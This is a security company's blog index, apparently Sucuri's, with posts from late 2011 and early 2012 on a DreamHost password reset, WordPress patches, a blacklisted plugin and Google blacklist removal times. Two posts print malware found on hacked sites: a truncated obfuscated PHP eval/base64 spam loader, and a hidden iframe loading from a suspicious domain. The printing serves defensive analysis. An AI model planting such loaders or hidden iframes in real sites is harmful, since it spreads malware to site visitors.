DreamHost Security Issue Prompts FTP Password Resets

Posted on January 21, 2012 by Dre Armeda

Yesterday on the DreamHost Status Blog, it was announced that all shell/FTP passwords would be reset due to what looks to be a security breach that was discovered on one of the DreamHost database servers.

DreamHost Security BreachDreamHost looks to have done a great job notifying affected customers via the update page, keeping them up-to-date throught out the day until the issue was resolved. It looks like all FTP passwords were indeed reset.

We recommend that all DreamHost customers log into to their accounts and check their account status. It is encouraged that you change your account passwords, and it wouldn’t hurt to change your FTP and database passwords again just to make sure.
Read more.


Posted in DreamHost, FTP, hacked, htaccess, Passwords, pharma, sucuri | Tagged , , , , , | 1 Comment

Funny Spammers: Any Reproduction of This Document in Part or in Whole is Strictly Prohibited

Posted on January 13, 2012 by dd

Spam is nothing new, but a recent site we were reviewing was a bit different. After a bit of analysis, we found a file called tracks.php that was generating spam with the following code on it:

<?php // Any reproduction of this document in part or in whole is strictly prohibited. For educational purposes only. 1993-2011 (c)
error_reporting(0) ;eval ( base64_decode("JGxMOXdGMWFZNHpYNmpUMWdUNmdRN2xPMG..

Read more.


Posted in malware, malware_updates, pharma, spam | Tagged , , , | Leave a comment

Better Engagement and Giving Back

Posted on January 11, 2012 by Tony

Hi folks, we’re really excited about 2012, specifically because of our goal to give back more. This is in line with our core theme, to help the end-user better secure their environments. Things are not always perfect, but we strive to be there for you when everything else seems to be going wrong.

One of the new items we’ll be implementing this year will be quarterly management meetings. For those that don’t know, we are a virtually distributed team spanning across North and South America. The purpose of these meetings will be to continue to improve our services, address issues we see everyday, and look to the future.
Read more.


Posted in community, sucuri, team | Tagged , , , | Leave a comment

Ask Sucuri: Why Do I Only Get Malware Warnings on Certain Browsers?

Posted on January 10, 2012 by dd

A few days ago, our scanner alerted that a site had malware related to the Blackhole Exploit Kit. The owner of the site said that when he visited the site, nothing happened, and the malware wasn’t displayed – probably thinking it was a false positive.

After a bit of manual testing, we noted that the malware was only being displayed to certain browsers (IE and Chrome on Windows), and not on the others.

Once we got access to the site, we learned why. It had the following code on the index.php file:
Read more.


Posted in hacked, malware, malware_updates, virus | Tagged , , , | Leave a comment

WordPress 3.3 XSS Vulnerability Patched (3.3.1 Released)

Posted on January 3, 2012 by dd

We just learned of a reflected XSS vulnerability in WordPress 3.3 via the comments form (wp-comments.php). It is explained in detail here.

The disclosed vulnerability can only be triggered via Internet Explorer according to the disclosing party, our tests lead to the same result.

To further note, this is hard to reproduce because it does not get triggered when WordPress is installed via a domain. If you’re running WordPress 3.3, and WordPress was installed via a domain, you’re not vulnerable. (ethicalhack3r)

We do not consider this to be a serious vulnerability, however, we recommend updating to WordPress 3.3.1 since the vulnerability can be used in targeted attacks. More info on the release can be found in the WordPress Codex, over via the release post.


Posted in vulnerability, wordpress, xss | Tagged , , | 2 Comments

Happy New Year From the Sucuri Team

Posted on January 3, 2012 by dd

Just a quick message to thank everyone that worked with us during 2011 (clients, partners and friends), and to wish a wonderful 2012 to all of you.

We have some cool projects and posts to share in the near future, so stay tune for updates soon.


Posted in sucuri | Tagged | Leave a comment

Blacklist Warnings for Users of the Stream-Video-Player WordPress Plugin

Posted on December 27, 2011 by dd

If you are using the plugin stream-video-player, it might be a good idea to disable this plugin for now.

The plugin loads a Flash player from “http://rod.gs/_SVP/5.7.1896/player.swf?ver=1.3.2″, a domain (rod.gs) which is currently blacklisted by Google, so anyone visiting your site will get the cross-site warning message. Since it is a popular plugin (with more than 100k downloads), this could be affecting quite a few websites.
Read more.


Posted in blacklist, blacklisted, malware, malware_updates, plugin, wordpress | Tagged , , , , , | Leave a comment

Malware Being Called From Your php.ini File

Posted on December 22, 2011 by dd

Is your site infected with malware, and you can’t find it anywhere? It might be a good idea to search outside of your web directory, and look in your main configuration files (specially if you are on a dedicated/VPS server).

We are seeing an increased number of infected sites with malicious iframes, similar to this one:

<style type=”text/css”>#doxig {width: 10px;height: 10px;frameborder: no;visibility: hidden;scrolling: no;}</style><iframe id=”doxig” src="http://1306a95ajbr.liga4giurgiu.info/ad.jpg?2"></iframe>

These specific strings aren’t typically found anywhere in the website files, which is very concerning. We’re finding that entire servers are being compromised, and the main server php.ini file (/etc/php/php.ini) has the following setting added:

Read more.


Posted in hacked, malware, malware_updates, vulnerability | Tagged , , , | Leave a comment

Ask Sucuri: How Long Does It Take For a Site To Be Removed From Google’s Blacklist? – Updated

Posted on December 14, 2011 by dd

If you have any questions about malware, blacklisting, or security in general, send it over to us: contact@sucuri.net and we will answer here. For all the “Ask Sucuri” answers, click here

This is an update to our previous post about Google blacklisting. We have some updated numbers to share.

Question: My site was hacked and we cleaned and secured it properly. We also scanned it, and it is showing up as clean. However, it is still blacklisted by Google. How long until they remove us?

Answer: This is a very common question. In fact, every time we clear a hacked site, their owner asks us the same question: How long until that scary red warning sign is gone?

To give a solid answer to our clients, we started to time how long it takes from when the review submission is requested, until the site is reviewed and removed by Google. We have now measured a few hundred blacklist removals and we have some good numbers to back up our tests.

Current Results:

  • Average time from submission to removal: 440 minutes (about 7 hours)
  • Maximum time: 792 (13 hours)
  • Minimum time: 290 (a bit less than 5 hours)

On average, it takes Google around 7 hours to clear your “bad” website from their lists. For our lucky clients, it takes roughly 5-6 hours. Another important point that some people forget is that you need to request a review! Google will not automatically remove a site once cleaned.

How do you increase your odds of getting cleared faster?

  1. Make sure to clean everything up!
  2. Do not remove the infected files, fix them. If you remove them, they will 404, and a 404 will delay the verification (even if you need to leave the file with a 0-size, don’t remove it until after the site is de-listed).
  3. Follow best practices to increase security on your site so that you minimize the risk of reinfection.

That’s it. Let us know if you have any questions or comments.

Is your site hacked? Blacklisted? We are here to help! We can get your sites cleaned up and secured right away!


Posted in ask, blacklist, blacklisted, google, sucuri | Tagged , , , , | Leave a comment

WordPress 3.3 is Out

Posted on December 12, 2011 by dd

For all our WordPress users, please remember to update to WordPress 3.3 that was just released. It should be a quick 1-click process in your dashboard, and nobody have an excuse not to do so.

And if you are currently using any version before 3.2.1, you better run!

Thanks,


Posted in wordpress | Leave a comment
RSS Delicious